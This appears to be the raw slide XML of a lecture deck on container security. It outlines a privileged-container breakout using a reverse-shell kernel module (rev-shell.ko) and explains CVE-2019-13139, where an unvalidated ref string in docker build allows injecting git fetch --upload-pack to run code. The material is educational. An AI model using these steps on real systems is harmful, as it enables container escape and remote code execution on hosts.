              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a: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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3752776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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Preparation of the attack: make file creation and execute it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200"/>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A black screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FB963A-90A7-DB7D-F559-B1DB8E611CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3904410" y="2368924"/>
            <a:ext cx="3800475" cy="14478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F88C1685-7888-89FC-88B7-DDC93C8C9762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3405188" y="3996859"/>
            <a:ext cx="5381625" cy="2181225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2112230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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Preparation of the attack: rev-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1"/>
              <a:t>shell.ko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> file created that contains malicious payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200"/>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A black screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD9C400F-0654-7CC6-758A-E20F4809CBE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3198719" y="2860862"/>
            <a:ext cx="5010150" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497592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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Run the attack: First, download that file in a container. </a:t>
            </a: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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker was listening in a port. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="ar-SA" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED707DE-F939-6548-7C98-089E9DC5A6F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046879" y="2557463"/>
            <a:ext cx="5829300" cy="1743075"/>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B7BA3AA7-5337-2C5C-890D-CFC3898C3F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6696355" y="4733085"/>
            <a:ext cx="2295525" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13053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Container attack using privileged flag</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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Run the attack: Execute the downloaded file  in the container. And attacker will get access to host machine.</a:t>
            </a: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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="ar-SA" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A black background with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66138118-308F-5E57-B174-0E6B45F93405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="985837" y="3431241"/>
            <a:ext cx="2936501" cy="54460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3942BCB-23C8-E0F4-ABEE-6B4DB915CB0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5910542" y="2919133"/>
            <a:ext cx="4248150" cy="3619500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425767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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2696571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Docker build code execution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marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker build: build Docker images from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and a context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A context can be a local path or a URL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a remote repository on GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>remote URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extract and run commands from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to be run by docker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a temporary git repository</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and fetch from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>remote </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The temporary repository is checked out and subdirectories are processed.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="3000" u="sng"/>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421055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Docker build code execution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marL="457200" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-2019-13139: a RCE in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker build </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ref </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>string is appended to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> list for the fetch command, without any validation to ensure it is a valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>refspec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="3000" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="3000" u="sng"/>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9C3E27-4BDC-01C0-7081-79DEC1DBDE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1559435344"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3040124" y="3256496"/>
          <a:ext cx="5943600" cy="396532"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5943600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="628674147"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="396532">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="-914400" algn="just" rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>docker build</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t> https://github.com/docker/rootfs.git#ref:subDir</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="1F1F1F"/>
                        </a:highligh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1F1F"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2097015693"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30722" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB26624-33DE-AFE4-5FEA-4AB498EDF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24" y="3832415"/>
            <a:ext cx="6096000" cy="2579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565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Docker build code execution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fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilize the git fetch command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--upload-pack=&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA" sz="2400" b="0" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to execute maclicous code</a:t>
            </a:r>
